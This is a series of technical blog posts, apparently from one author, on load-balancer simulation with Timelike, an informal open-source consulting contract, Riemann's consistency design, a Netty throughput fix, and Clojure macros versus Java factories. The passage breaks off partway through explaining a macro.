Heroku runs a Rails application in a virtual machine called a Dyno, on EC2. Since the Rails server can only do one thing at a time, the dyno keeps a queue of HTTP requests, and applies them sequentially to the rails application. We'll talk to the dyno over a 2-millisecond-long network cable.

(defn dyno [] (cable 2 (queue-exclusive (delay-fixed 20 (delay-exponential 100 (server :rails))))))

This node can process an infinite queue of requests at the average rate of 1 every 124 milliseconds (2 + 20 + 100 + 2). But some requests take longer than others. What happens if your request lands behind a different, longer request? How long do you, the user, have to wait?

Introducing Timelike

Surprise! This way of describing network systems is also executable code. Welcome to Timelike.

(cable 2 ...) returns a function which accepts a request, sleeps for 2 milliseconds, then passes the request to a child function–in this case, a queuing function returned by queue-exclusive. Then cable sleeps for 2 more milliseconds to simulate the return trip, and returns the response from queue-exclusive. The request (and response) are just a list of events, each one timestamped. The return value of each function, or “node”, is the entire history of a request as it passes through the pipeline.

Network node composition is function composition–and since they're functions, we can run them.

(let [responses (future* ; In a new thread, generate poisson-distributed ; requests. We want 10,000 total, spaced roughly ; 150 milliseconds apart. Apply them to a single ; dyno. (load-poisson 10000 150 req (dyno)))] (prn (first @responses)) (pstats @responses))

Timelike doesn't actually sleep for 150 milliseconds between requests. The openjdk and oracle schedulers are unreliable as it stands–and we don't actually need to wait that long to compute the value of this function. We just virtualize time for every thread in the network (in this case, a thread per request). All operations complete “immediately” according to the virtual clock, and the clock only advances when threads explicitly sleep. We can still exploit parallelism whenever two threads wake up at the same time, and advance the clock whenever there's no more work to be done at a given time. The scheduler will even detect deadlocks and allow the clock to advance when active threads are blocked waiting to acquire a mutex held by a thread which won't release it until the future… though that's a little slow. ;-)

The upside of all this ridiculous lisp is that you can simulate concurrent systems where the results are independent of wall-clock time, which makes it easier to compare parallel systems at different scales. You can simulate one machine or a network of thousands, and the dynamics are the same.

Here's an example request, and some response statistics. We discard the first and last parts of the request logs to avoid measuring the warm-up or cool-down period of the dyno queue.

[{:time 0} {:node :rails, :time 66}] Total reqs: 10000 Selected reqs: 5000 Successful frac: 1.0 Request rate: 6.6635394 reqs/s Response rate: 6.653865 reqs/s Latency distribution: Min: 22.0 Median: 387.0 95th %: 1728.0 99th %: 2894.1100000000024 Max: 3706.0

Since the request and response rates are close, we know the dyno was stable during this time–it wasn't overloaded or draining its queue. But look at that latency distribution! Our median request took 3 times the mean, and some requests blocked for multiple seconds. Requests which stack up behind each other have to wait, even if they could complete quickly. We need a way to handle more than one request at a time.

How do you do that with a singlethreaded Rails? You run more server processes at once. In Heroku, you add more dynos. Each runs in parallel, so with n dynos you can (optimally) process n requests at a time.

(defn dynos "A pool of n dynos" [n] (pool n (dyno)))

There's those funny macros again.

Now you have a new problem: how do you get requests to the right dynos? Remember, whatever routing system we design needs to be distributed–multiple load balancers have to coordinate about the environment.

Random routing

Random load balancers are simple. When you get a new request, you pick a random dyno and send the request over there. In the infinite limit this is fine; a uniformly even distribution will distribute an infinite number of requests evenly across the cluster. But our systems aren't infinite. A random LB will sometimes send two, or even a hundred requests to the same dyno even when its neighbors go unused. That dyno's queue will back up, and everyone in that queue has to wait for all the requests ahead of them.

(lb-random (dynos 250))Total reqs: 100000 Selected reqs: 50000 Successful frac: 1.0 Request rate: 1039.7172 reqs/s Response rate: 1012.6787 reqs/s Latency distribution: Min: 22.0 Median: 162.0 95th %: 631.0 99th %: 970.0 Max: 1995.0

A cool thing about random LBs is that they require little coordinated state. You don't have to agree with your peers about where to route a request. They also compose freely: a layer of random load balancers over another layer of random load balancers has exactly the same characteristics as a single random load balancer, assuming perfect concurrency. On the other hand, leaving nodes unused while piling up requests on a struggling dyno is silly. We can do better.

Round-Robin routing

Round-robin load balancers write down all their backends in a circular list (also termed a “ring”). The first request goes to the first backend in the ring; the second request to the second backend, and so forth, around and around. This has the advantage of evenly distributing requests, and it's relatively simple to manage the state involved: you only need to know a single number, telling you which element in the list to point to.

(lb-rr (dynos 250))Total reqs: 100000 Selected reqs: 50000 Successful frac: 1.0 Request rate: 1043.9939 reqs/s Response rate: 1029.6116 reqs/s Latency distribution: Min: 22.0 Median: 105.0 95th %: 375.0 99th %: 560.0 Max: 1173.0

We halved our 95th percentile latencies, and cut median request time by roughly a third. RR balancers have a drawback though. Most real-world requests–like the one in our model–take a variable amount of time. When that variability is large enough (relative to pool saturation), round robin balancers can put two long-running requests on the same dyno. Queues back up again.

Least-connections routing

A min-conn LB algorithm keeps track of the number of connections which it has opened on each particular backend. When a new connection arrives, you find the backend with the least number of current connections. For singlethreaded servers, this also corresponds to the server with the shortest queue (in terms of request count, not time).

(lb-min-conn (dynos 250))Total reqs: 100000 Selected reqs: 50000 Successful frac: 1.0 Request rate: 1049.7806 reqs/s Response rate: 1041.1244 reqs/s Latency distribution: Min: 22.0 Median: 92.0 95th %: 322.0 99th %: 483.0 Max: 974.0

Our 95th percentile latency has gone from 600 ms, to 375 ms, to 322ms. This algorithm is significantly more efficient over our simulated dynos than random or round-robin balancing–though it's still not optimal. An optimal algorithms would predict the future and figure out how long the request will take before allocating it–so it could avoid stacking two long-running requests in the same queue.

Least-conns also means keeping track of lots of state: a number for every dyno, at least. All that state has to be shared between the load balancers in a given cluster, which can be expensive. On the other hand, we could afford up to a 200-millisecond delay on each connection, and still be more efficient than a random balancer. That's a fair bit of headroom.

Meanwhile, in the real world

Heroku can't use round-robin or min-conns load balancers for their whole infrastructure–it's just too big a problem to coordinate. Moreover, some of the load balancers are far apart from each other so they can't communicate quickly or reliably. Instead, Heroku uses several independent least-conns load balancers for their Bamboo stack. This has a drawback: with two least-conns routers, you can load the same dyno with requests from both routers at once–which increases the queue depth variability.

Let's hook up a random router to a set of min-conns routers, all backed by the same pool of 250 dynos. We'll separate the random routing layer from the min-conns layer by a 5-millisecond-long network cable.

(defn bamboo-test [n] (test-node (str "Bamboo with " n " routers") (let [dynos (dynos pool-size)] (lb-random (pool n (cable 5 (lb-min-conn dynos))))))) (deftest ^:bamboo bamboo-2 (bamboo-test 2)) (deftest ^:bamboo bamboo-4 (bamboo-test 4)) (deftest ^:bamboo bamboo-8 (bamboo-test 8)) (deftest ^:bamboo bamboo-16 (bamboo-test 16))

This plot sums up, in a nutshell, why RapGenius saw terrible response times. Latencies in this model–especially those killer 95th and 99th percentile times–rise linearly with additional least-conns routers (asymptotically bounded by the performance of a random router). As Heroku's Bamboo cluster grew, so did the variability of dyno queue depths.

bamboo.png

This is not the only routing topology available. In part 2, I explore some other options for distributed load balancing. If you want to experiment with Timelike for yourself, check out the github project.

I'm not a big fan of legal documents. I just don't have the resources or ability to reasonably defend myself from a lawsuit; retaining a lawyer for a dozen hours would literally bankrupt me. Even if I were able to defend myself against legal challenge, standard contracts for software consulting are absurd. Here's a section I encounter frequently:

Ownership of Work Product. All Work Product (as defined below) and benefits thereof shall immediately and automatically be the sole and absolute property of Company, and Company shall own all Work Product developed pursuant to this Agreement.

“Work Product” means each invention, modification, discovery, design, development, improvement, process, software program, work of authorship, documentation, formula, data, technique, know-how, secret or intellectual property right whatsoever or any interest therein (whether or not patentable or registrable under copyright or similar statutes or subject to analogous protection) that is made, conceived, discovered, or reduced to practice by Contractor (either alone or with others) and that (i) relates to Company’s business or any customer of or supplier to Company or any of the products or services being developed, manufactured or sold by Company or which may be used in relation therewith, (ii) results from the services performed by Contractor for Company or (iii) results from the use of premises or personal property (whether tangible or intangible) owned, leased or contracted for by Company.

These paragraphs essentially state that any original thoughts I have during the course of the contract are the company's property. If the ideas are defensible under an IP law, I could be sued for using them in another context later. One must constantly weigh the risk of thinking under such a contract. “If I consider this idea now, I run the risk of inventing something important which I can never use again.”

If you're contracted to work on an open-source project, the ramifications are bigger than just your life. Any code you write or data structure you invent is the company's property. You've got to trust that the company will make that code available under the project's license. If they don't do that, you're stuck: you can never implement that idea in the OSS project without running the risk of a lawsuit. Any work you do for the contract is potentially toxic, and must be withheld from the project and all its users, not to mention your future employers.

You'd think IP lawyers would realize this is counter-productive, right? Contracts like this give you huge incentives to ignore the client's problems, to not listen to their ideas, to not think about solutions, because every novel thought carries an unknown risk of being locked away forever.

I prefer informal contracts–an agreement that tries to express the reasonable obligations of two parties to each other in clear, sensible language. It's legally indefensible, I'm sure. I just want to understand my obligation to the company, and express my dedication to that task, my abilities and shortcomings, as well as possible. I also have an obligation to the open-source community–especially Riemann's users–to make improvements widely available. Balancing those takes care.

So here's an example of the sort of agreement I usually propose, instead:

Hello there!

This is a contract between Kyle Kingsbury (I, me), and FooCorp.

Time

I'm going to help you instrument your systems with Riemann. I'll do my
best to be available from 1000 to 1800 Pacific, every weekday, to speak
with FooCorp's engineers, and may be available during other times as
well. We can negotiate together to figure out what schedule makes sense.

FooCorp will probably ask for features, research, documentation, or
other improvements to Riemann. In addition to regular business hours, I
may work on these problems “whenever I feel like it”–nights, weekends,
etc, so long as the FooCorp employee I'm working with approves. I'll do
my best to provide realistic time estimates for any significant
undertaking, and suggest alternatives where sensible.

I'll keep a daily log of the hours I work, and a high-level overview of
what I accomplished each day.

Termination of contract

I'll complete up to 80 hours of work specifically for FooCorp. At any
time, either I or FooCorp may terminate this agreement for any
reason–for instance, if I complete all the work FooCorp asks for, if
my work is unsatisfactory, or if I accept a job offer which prohibits
outside employment. I'll clearly communicate if any circumstances like
this arise, and ask FooCorp to kindly do the same.

If this happens I'll do my best to reach a good stopping point, and
continue supporting FooCorp through Riemann's open-source channels.

Ownership of work

Riemann is an open-source project. Any code, documentation, features,
etc I produce which are suitable for the whole community will be
integrated into Riemann's codebase, published on Github, and licensed
under the EPL. FooCorp may, at their discretion, be thanked in the web
site for their feedback, advice, financial support, etc. “This feature
brought to you by…”, that sort of thing.

Riemann has specific design goals. If FooCorp requests features which
don't make sense for Riemann's design, I may refuse to make those
changes. However, I'll do my best to suggest an alternate design (e.g. a
library or standalone program) and help build that, instead.

Whenever FooCorp requests, I can create works (documentation, software,
etc.) which are not released as a part of the open-source project.
This closed-source work will be delivered to FooCorp and will be their
responsibility to maintain. I assign to FooCorp full ownership of this
closed-source work, and unlimited reproduction rights, distribution
rights, sublicensability, transferability, etc.

Open-source code will likely be easier for FooCorp to maintain, and
will receive community-generated improvements. For instance, I may fix
bugs in open-source features later, and you can take advantage of those
improvements.

Ownership of ideas

I may sign a nondisclosure agreement with FooCorp. Since all of
Riemann's ideas are open-source, there is no risk in disclosing those
ideas to FooCorp. I will not, to the best of my abilities, make use of
or disclose proprietary or secret information from FooCorp in any
context other than our work together.

I may make use of proprietary or secret information to improve the
open-source Riemann, but not in a way which discloses that information.
For instance, I might discover that your company needs to push
information about 2 million users through Riemann, and improve
performance to allow that. I won't disclose that you have 2 million
users–but I will write and release the code to make it possible.

Any unique information, algorithms, data structures, vague notions, etc.
I invent or research during this contract are not FooCorp's property,
and may be disclosed or integrated into my work at any time. For
example, if I realize I can improve performance by reorganizing streams
in a certain way, FooCorp can't sue me if I make that performance
improvement after our contract is over.

No warranty

I make no guarantee as to the correctness, safety, performance, etc of
any works produced, but I'll certainly do my best during the contract.
My goal is to get clean, fast, tested, runnable code into your hands.
FooCorp is welcome to ask for help after our contract ends, through
open-source, personal, or business channels–but I am under no
contractual obligation to fulfill those requests.

In practical terms, if I build something for you, let's test it during
the contract and make sure it works! That way I can fix it if there's
something wrong.

Payment

When our contract is over (due to early termination or at the end of 80
hours), or every 30 days, whichever comes first, I'll email an invoice
to FooCorp for the hours of work completed. FooCorp will mail a check
to Kyle Kingsbury within 30 days of that email receipt.

My hourly rate for this contract is $100/hr.

Thanks for your consideration, and I look forward to working with you!

–Kyle

My contracts are significantly shorter than the standardized consulting contracts I usually see. They also emphasize different things. Typical contracts spend a lot of time concerned with listing rights, which is important because in a legal dispute you need to point to those exact words in the document. Typical contracts, on the other hand, give little guidance about how the relationship should work. I try to emphasize the role of good communication–pointing out places where we might disagree, or where it's important to come to a shared understanding as the relationship evolves. I try to suggest specific hours for my availability, which is something many contracts don't address at all. I also try to give examples to justify the terms I'd like to use–under the hypothesis that if we understand the spirit of the agreement, we're less likely to argue over technicalities.

tl;dr Riemann is a monitoring system, so it emphasizes liveness over safety.

Riemann is aimed at high-throughput (millions of events/sec/node), partial-harvest event processing, where it is acceptable to trade completeness for throughput at low latencies. For instance, it's probably fine to drop half of your request latency events on the floor, if you're calculating a lossy histogram with sampling anyway. It's also typically acceptable to have nondeterministic behavior with respect to time windows: if one node's clock is skewed, it's better to process it “soonish” rather than waiting an unbounded amount of time for it to check in.

There is no synchronization or relationship between events. Events are immutable and have a total order, even though a given server or client may only have a fraction of the relevant events for a system. The events are, in a sense, the transaction log–except that the semantics of those transactions depend on the stream configuration.

Riemann is only trivially distributed: clients send events to servers. Servers can act as clients themselves. The protocol provides synchronous acknowledgement of each received event… which could mean “your write is durably stored on disk” or “I threw your write on a queue, good luck have fun”, or any mixture in between, like “I queued your write for use by a windowing stream, I queued it for submission to Librato metrics, and reacted to the failure condition by sending an email which has been acked by the mail system.”

All of these guarantees are present only for a single server. At some point Riemann will need to be available during partitions.

The “Fuck it, no coordination” model, which I have now, allows for degraded harvest and low latencies for data which it's OK to lose some of. A simple strategy is to carpetbomb every Riemann server in the cluster with your events with the usable tunable write-replica threshold. Each server might have a slightly different view of the world, depending on where it was partitioned and how long.

Stronger consistency

Some events (which happen infrequently) need strong coordination. We need to guarantee, for example, that of three Riemann servers responsible for this datacenter, exactly one sends the “hey, the web server's broken” email. These events require bounded guarantees of both liveness: “Someone must send an email in five seconds” and safety: “I don't care who but one of you better do it”.

I'm pretty sure these constraints on side effects essentially violate CAP, in the face of arbitrary partitions. If a node decides “I'll send it”, sends the email, then explodes just before telling the others “I sent it!”, the remaining nodes have no choice but to send a duplicate message.

In the event of these failure modes (like a total partition), duplicates are preferable to doing nothing. Waaay better to page someone twice than to risk not paging them at all.

However, there are some failure modes where I can provide delivered-once guarantees of side effects. For example, up to floor(n/2) node failures, or a partition which leaves a fully-connected quorum. In these circumstances, 2PC or Paxos can give me strong consistency guarantees, and I can detect (in many cases, I think) the failure modes which would result in sacrificing consistency and requiring a duplicate write. A Riemann server can call someone and say,

“Hey, I just paged you, and this is crazy, but I've got split brain, I'll call twice maybe.”

Since events are values, I can serialize and compare them. That means you might actually be able to write, in the streams config, an expression which means “attempt to ensure these events are processed on exactly one host in the cluster.”

(streams (where (state "critical") ; This is unsynchronized and proceeds on all nodes concurrently #(prn "Uh oh, this thing's broken!" %) (master ; Any events inside master are executed on exactly one node if ; quorum is preserved, or maybe multiple hosts if a node fails before ; acking. (email "aphyr@aphyr.com"))))

…which is most useful when clients can reach a majority of servers (and allows clients to guarantee whether or not their event was accepted.) I can also provide a weaker guarantee along the lines of “Try to prevent all connected peers from sending this event within this time window,” which is useful for scenarios where you want to know about errors which occurred in minority partitions and it's likely that clients will be partitioned with their servers; e.g. one Riemann per agg switch or DC.

This doesn't guarantee all nodes have the same picture of the world which led up to that failure. I think doing that would require full coordination between all nodes about the event stream (and its ordering), which would impose nontrivial synchronization costs. Explicit causal consistency could improve this, but we'd need a way to express and compute those causal relationships between arbitrary stream functions somehow.

Realistically, this may not be a problem. When Riemann sees a quorum loss it can wake someone up, and when the partition is resolved nodes will converge rapidly on “hey, that service still isn't checking in.”

A third path

What I don't know yet is whether there's a role for events which don't need the insane overhead of 2PC or paxos for every… single… event… but do need some kind of distributed consistency. HAT is interesting because it provides reasonably strong consistency guarantees for an AP system, but at the cost of liveness. Is that liveness tradeoff suitable for Riemann, where responding Right Now is critical? Probably not. But it might be useful for historical stores, or expressing distributed multi-event transactions–which currently don't exist. I don't even know what this would mean in an event-oriented context.

Why? Riemann's event model treats events as values. Well-behaved clients provide a total order and identity over events based on their host, service, and timestamps. This means reconstructing any linear subset of the event stream can be done in an eventually consistent way. if Riemann were to become a historical store, reconciling divergent histories would simply be the set union of all received events.

Except for derived events. What happens when a partition separates two Riemann servers measuring request throughput? Each receives half of the events it used to, and their rate streams start emitting events with a metric half as big as they used to. If both Riemann servers are logging these events to a historical store, the store will show only half the throughput it used to.

One option is to log only raw events and reconstruct derived events by replaying the merged event log. What was the rate at noon? Apply all the events from 11:55 to 12:00 to the rate stream and see.

Another option might be for rate streams themselves to be transactional in nature, but I'm not sure how to do that in a way which preserves liveness guarantees.

I've been doing a lot of performance tuning in Riemann recently, especially in the clients–but I'd like to share a particularly spectacular improvement from yesterday.

The Riemann protocol

Riemann's TCP protocol is really simple. Send a Msg to the server, receive a response Msg. Messages might include some new events for the server, or a query; and a response might include a boolean acknowledgement or a list of events matching the query. The protocol is ordered; messages on a connection are processed in-order and responses sent in-order. Each Message is serialized using Protocol Buffers. To figure out how large each message is, you read a four-byte length header, then read length bytes, and parse that as a Msg.

time ---> send: [length1][msg1] [length2][msg2] recv: [length1][msg1] [length2][msg2]

The optimization I discussed last time–pipelining requests–allows a client to send multiple messages before receiving their acknowledgements. There are many queues in between a client saying “send a message” and that message actually being parsed in Riemann: Java IO buffers, the kernel TCP stack, the network card, various pieces of networking hardware, the wires themselves… all act like queues. This means throughput is often limited by latency, so by writing messages asynchronously we can achieve higher throughput with only minor latency costs.

The other optimization I've been working on is batching. For various reasons, this kind of protocol performs better when messages are larger. If you can pack 100 events into a message, the server can buffer and parse it in one go, resulting in much higher throughputs at the cost of significantly higher latencies–especially if your event needs to sit in a buffer for a while, waiting for other events to show up so they can be sent in a Msg.

Netty's threadpools

For any given connection, Netty (as used in Riemann) has two threadpools handling incoming bytes: the IO worker pool, and a handler pool which actually handles Riemann events. The IO worker pool is busy shuttling bytes back and forth from the TCP connection buffers through the pipeline–but if an IO worker spends too much time on a single channel, it won't be able to handle other channels and latencies will rise. An ExecutionHandler takes over at some point in the pipeline, which uses the handler pool to do long-running work like handling a Msg.

Earlier versions of Riemann put the ExecutionHandler very close to the end of the pipeline, because all the early operations in the pipeline are really fast. The common advice goes, “Wrap long-running tasks in an execution handler, so they don't block”. OK, makes sense.

(channel-pipeline-factory int32-frame-decoder (int32-frame-decoder) ; Read off 32-bit length headers ^:shared int32-frame-encoder (int32-frame-encoder) ; Add length header on the way out ^:shared protobuf-decoder (protobuf-decoder) ; Decode bytes to a Msg ^:shared protobuf-encoder (protobuf-encoder) ; Encode a Msg to bytes ^:shared msg-decoder (msg-decoder) ; Convert Msg to a record ^:shared msg-encoder (msg-encoder) ; Convert a record to a Msg ^:shared executor (execution-handler) ; Switch to handler threadpool ^:shared handler (gen-tcp-handler ; Actually process the Msg core channel-group tcp-handler))

Now… a motivated or prescient reader might ask, “How, exactly, does the execution handler get data from an IO thread over to a handler thread?”

It puts it on a queue. Like every good queue it's bounded–but not by number of items, since some items could be way bigger than others. It's bounded by memory.

(defn execution-handler "Creates a new netty execution handler." [] (ExecutionHandler. (OrderedMemoryAwareThreadPoolExecutor. 16 ; Core pool size 1048576 ; 1MB per channel queued 10485760 ; 10MB total queued )))

How does the Executor know how much memory is in a given item? It uses a DefaultObjectSizeEstimator, which knows all about Bytes and Channels and Buffers… but absolutely nothing about the decoded Protobuf objects which it's being asked to enqueue. So the estimator goes and digs into the item's fields using reflection:

int answer = 8; // Basic overhead. for (Class<?> c = clazz; c != null; c = c.getSuperclass()) { Field[] fields = c.getDeclaredFields(); for (Field f : fields) { if ((f.getModifiers() & Modifier.STATIC) != 0) { // Ignore static fields. continue; } answer += estimateSize(f.getType(), visitedClasses);

Of course, I didn't know this at the time. Netty is pretty big, and despite extensive documentation it's not necessarily clear that an OrderedMemoryAwareThreadPoolExecutor is going to try and guess how much memory is in a given object, recursively.

So I'm staring at Yourkit, completely ignorant of everything I've just explained, and wondering why the devil DefaultObjectSizeEstimator is taking 38% of Riemann's CPU time. It takes me ~15 hours of digging through Javadoc and source and blogs and StackOverflow to realize that all I have to do is…

  1. Build my own ObjectSizeEstimator, or
  2. Enqueue things I already know the size of.
(channel-pipeline-factory int32-frame-decoder (int32-frame-decoder) ^:shared int32-frame-encoder (int32-frame-encoder) ^:shared executor (execution-handler) ; <--+ ^:shared protobuf-decoder (protobuf-decoder) ; | ^:shared protobuf-encoder (protobuf-encoder) ; | ^:shared msg-decoder (msg-decoder) ; | ^:shared msg-encoder (msg-encoder) ; ___| ^:shared handler (gen-tcp-handler core channel-group tcp-handler))

Just move one line. Now I enqueue buffers with known sizes, instead of complex Protobuf objects. DefaultObjectSizeEstimator runs in constant time. Throughput doubles. Minimum latency drops by a factor of two.

drop tcp event batch throughput.png

drop tcp event batch latency.png

Throughput here is measured in messages, each containing 100 events, so master is processing 200,000–215,000 events/sec. Latency is for synchronous calls to client.sendEvents(anEvent). The dropoff at the tail end of the time series is the pipelining client draining its message queue. Client and server are running on the same quad-core Q8300, pushing about 20 megabytes/sec of traffic over loopback. Here's what the riemann-bench session looks like, if you're curious.

Why didn't you figure this out sooner?

I wrote most of this code, and what code I didn't write, I reviewed and tested. Why did it take me so long to figure out what was going on?

When I started working on this problem, the code looked nothing like the pipeline I showed you earlier.

The Netty pipeline evolved piecemeal, by trial-and-error, and went through several refactorings. The UDP server, TCP server, and Graphite server share much of the same code, but do very different things. I made several changes to improve performance. In making these changes I tried to minimize API disruption–to keep function interfaces the same–which gradually pulled the pipeline into several interacting pieces. Since Netty's API is well-written, flexible Java code, it comes with literally hundreds of names to keep track of. Keeping function and variable names distinct became a challenge.

By the point I started digging into the problem, I was hard pressed to figure out what a channel pipeline factory was, let alone how it was constructed.

In order to solve the bug I had to understand the code, which meant inventing a new language to talk about pipelines. Once I'd expressed the pipeline clearly, it was obvious how the pieces interacted. Experimenting with new pipelines took a half hour, and I was able to almost double throughput with a single-line change.

I've had two observations floating around in my head, looking for a way to connect with each other.

Many “architecture patterns” are scar tissue around the absence of higher-level language features.

and a criterion for choosing languages and designing APIs

Write down the simplest syntactically valid expression of what you want to do. That expression should be a program.

First, let me clarify that there are all sorts of wonderful patterns in software–things like “functions”, “iteration”, “monads”, “concurrent execution”, “laziness”, “memoization”, and “parametric polymorphism”. Sometimes, though, we write the same combination of symbols over and over again, in a nontrivial way. Maybe it takes ten or twenty lines to encapsulate an idea, and you have to type those lines every time you want to use the idea, because the language cannot express it directly. It's not that the underlying concept is wrong–it's that the expression of it in a particular domain is unwieldy, and has taken on a life of its own. Things like Builders and, in this post, Factories.

Every language emphasizes some of these ideas. Erlang, for instance, emphasizes concurrency, and makes it easy to write concurrent code by introducing special syntax for actors and sending messages. Ruby considers lexical closures important, and so it has special syntax for writing blocks concisely. However, languages must balance the expressiveness of special syntax with the complexity of managing that syntax's complexity. Scala, for instance, includes special syntactic rules for a broad variety of constructs (XML literals, lexical closures, keyword arguments, implicit scope, variable declaration, types)—and often several syntaxes for the same construct (method invocation, arguments, code blocks). When there are many syntax rules, understanding how those rules interact with each other can be difficult.

I argue that defining new syntax should be a language feature: one of Lisp's strengths is that its syntax is both highly regular but also semantically fluid. Variable definition, iteration, concurrency, and even evaluation rules themselves can be defined as libraries—in a controlled, predictable way. In this article, I'd like to give some pragmatic examples as to why I think this way.

Netty

There's a Java library called Netty, which helps you write network servers. In Netty each connection is called a channel, and bytes which come from the network flow through a pipeline of handlers. Each handler transforms incoming messages in some way, and typically forwards a different kind of message to the next handler down the pipeline.

Now, some handlers are safe to re-use across different channels–perhaps because they don't store any mutable state. For instance, it's OK to use a ProtobufDecoder to decode several Protocol Buffer messages at the same time. It's not safe, however, to use a LengthFieldBasedFrameDecoder to decode two channels at once, because this kind of decoder reads a length header, then saves that state and uses it to figure out how many more bytes it needs to accept from that channel. We need a new LengthFieldBasedFrameDecoder every time we accept a new connection.

In languages which have first-class functions, the easiest way to get a new, say, Pipeline is to write down a function which makes a new Pipeline, and then call it whenever you need one. Here's one for Riemann.

(fn [] (doto (Channels/pipeline) (.addLast "integer-header-decoder" (LengthFieldBasedFrameDecoder. Integer/MAX_VALUE 0 4 0 4)) (.addLast "protobuf-decoder" (ProtobufDecoder. (Proto$Msg/getDefaultInstance)))))

Doto is an example of redefinable syntax. It's a macro—a function which rewrites code at compile time. Doto transforms code like (doto obj (function1 arg1) (function2)) into (let [x obj] (function1 x arg1) (function2 x) x), where x is a unique variable which will not conflict with the surrounding scope. In short, it simplifies a common pattern: performing a series of operations on the same object, but eliminates the need to explicitly name the object with a variable, or to write the variable in each expression.

Every time you call this function, it creates a new pipeline (with Channels.pipeline()), and adds a new LengthFieldBasedFrameDecoder to it, then adds a new protobuf decoder to it, then returns the pipeline.

Java doesn't have first-class functions. It has something called Callable, which is a parameterizable class for zero-arity functions, but since there are no arguments you're stuck writing a new class and explicitly closing over variables you need every time you want a function. Java works around these gaps by creating a new class for every function it might need, and giving that class a single method. These classes are called “Factories”. Netty has a factory specifically for generating pipelines, so to build new Pipelines, you have to write a new class.

public class RiemannTcpChannelPipelineFactory implements ChannelPipelineFactory public ChannelPipeline getPipeline() throws Exception { ChannelPipeline p = Channels.Pipeline(); p.addLast("integer-header-decoder", new LengthBasedFieldFrameDecoder(Integer/MAX_VALUE, 0, 4, 0, 4); p.addLast("protobuf-decoder", new ProtobufDecoder(Proto.Msg.getDefaultInstance())); return p; } } new RiemannTcpChannelPipelineFactory()

The class (and the interface it implements) are basically irrelevant–this class only has one method, and its type is inferrable. This is a first-class function, in Java. We can shorten it a bit by writing an anonymous class:

new ChannelPipelineFactory() { public ChannelPipeline getPipeline throws Exception {

… which saves us from having to name our factory, but we still have to talk about ChannelPipelineFactory, remember its method signature and constructor, etc–and the implementer still needs to write a class or interface.

Since Netty expects a ChannelPipelineFactory, we can't just feed it a Clojure function. Instead, we can use (reify) to create a new instance of a dynamically compiled class which implements any number of interfaces, and has final local variables closed over from the local environment. So if we wanted to reuse the same protobuf decoder in every pipeline…

(let [pb (ProtobufDecoder. (Proto$Msg/getDefaultInstance))] (reify ChannelPipelineFactory (getPipeline [this] (doto (Channels/pipeline) (.addLast "integer-header-decoder" (LengthFieldBasedFrameDecoder. Integer/MAX_VALUE 0 4 0 4)) (.addLast "protobuf-decoder" pb)))))

In Java, you'd create a new class variable, like so. Note that if you wanted to change pb you'd have to write some plumbing functions–getters, setters, constructors, or whatever, or use an anonymous class and close over a reference object.

public class RiemannTcpChannelPipelineFactory { final ProtobufDecoder pb = new ProtobufDecoder(Proto.Msg.getDefaultInstance()); ...

Now… these two create basically identical objects. Same logical flow. But notice what's missing in the Clojure code.

There's no name for the factory. We don't need one because it's a meaningless object–its sole purpose is to act like a partially applied function. It disappears into the bowels of Netty and we never think of it again. This is an entire object we didn't have to think up a name for, ensure that its name and constructor are consistent with the rest of the codebase, create a new file to put it in, and add that file to source control. The architecture pattern of “Factory”, and its associated single-serving packets of one verb each, has disappeared.

(let [adder (partial + 1 2)] (adder 3 4) ; => 1 + 2 + 3 + 4 = 10public class AdderFactory { public final int addend1; public final int addend2; ... public AdderFactory(final int addend1) { this.addend1 = addend1; } public AdderFactory(final int addend1, final int addend2) { this.addend1 = addend1; this.addend2 = addend2; } ... public int add(final int anotherAddend1, final int anotherAddend2) { return addend1 + addend2 + anotherAddend1 + anotherAddend2; } } AdderFactory adder = new AdderFactory(1, 2) adder.add(3, 4);

Factories are just awkward ways to express partial functions.

Back to Netty.

So far we've talked about a single ChannelPipelineFactory. What happens if you want to make more than one? Riemann has at least three–and I don't want to write down three classes for three almost-identical pipelines. I just want to write down their names, and the handlers themselves, and have a function take care of the rest of the plumbing.

Enter our sinister friend, the macro, stage left:

(defmacro channel-pipeline-factory "Constructs an instance of a Netty ChannelPipelineFactory from a list of names and expressions which evaluate to handlers. Names with metadata :shared are evaluated once and re-used in every invocation of getPipeline(), other handlers will be evaluated each time. (channel-pipeline-factory frame-decoder (make-an-int32-frame-decoder) ^:shared protobuf-decoder (ProtobufDecoder. (Proto$Msg/getDefaultInstance)) ^:shared msg-decoder msg-decoder)" [& names-and-exprs] (assert (even? (count names-and-exprs))) (let [handlers (partition 2 names-and-exprs) shared (filter (comp :shared meta first) handlers) forms (map (fn [[h-name h-expr] ] `(.addLast ~(str h-name) ~(if (:shared (meta h-name)) h-name h-expr))) handlers)] `(let [~@(apply concat shared)] (reify ChannelPipelineFactory (getPipeline [this] (doto (org.jboss.netty.channel.Channels/pipeline) ~@forms))))))

What the hell is this thing?

Well first, it's a macro. That means it's Clojure code which runs at compile time. It's going to receive Clojure source code as its arguments, and return other code to replace itself. Since Clojure is homoiconic, its source code looks like the data structure that it is. We can use the same language to manipulate data and code. Macros define new syntax.

First comes the docstring. If we say (doc channel-pipeline-factory) at a REPL, it'll show us the documentation written here, including an example of how to use the function. ^:shared foo is metadata–the symbol foo will have a special key called :shared set on its metadata map. We use that to discriminate between handlers that can be shared safely, and those which can't.

[& names-and-exprs]

These are the arguments: a list like [name1 handler1 name2 handler2].

(assert (even? (count names-and-exprs)))

This check runs at compile time, and verifies that we passed an even number of arguments to the function. This is a simple way to validate the new syntax we're inventing.

(let [handlers (partition 2 names-and-exprs) shared (filter (comp :shared meta first) handlers)

Now we assign a new variable: handlers. (partition 2) splits up the list of handlers into [name, handler] pairs, to make it easier to work with. Then we find all the handlers which are sharable between pipelines. (comp :shared meta first) composes three functions into one. Take the first part of the handler (the name), get its meta data, and tell me if it's :shared.

(let [handlers (partition 2 names-and-exprs) shared (filter (comp :shared meta first) handlers) forms (map (fn [[h-name h-expr] ] `(.addLast ~(str h-name) ~(if (:shared (meta h-name)) h-name h-expr))) handlers)]

Now we turn these pairs like [pb-decoder (ProtobufDecoder...)] into code like (.addLast "pb" pb) if it's shared, and (.addLast "pb" (ProtobufDecoder...)) otherwise. Where does the variable pb come from?

`(let [~@(apply concat shared)]

Ah, there it is. We take all the shared name/handler pairs and bind their names to their values as local variables. But wait–what's that backtick just before let? That's a special symbol for writing macros, and it means “Don't run this code–just construct it”. ~@ means “It's OK to run this code now–and insert whatever it returns in its place”. So the first part of the code we return will be the (let) expression binding shared names to handlers.

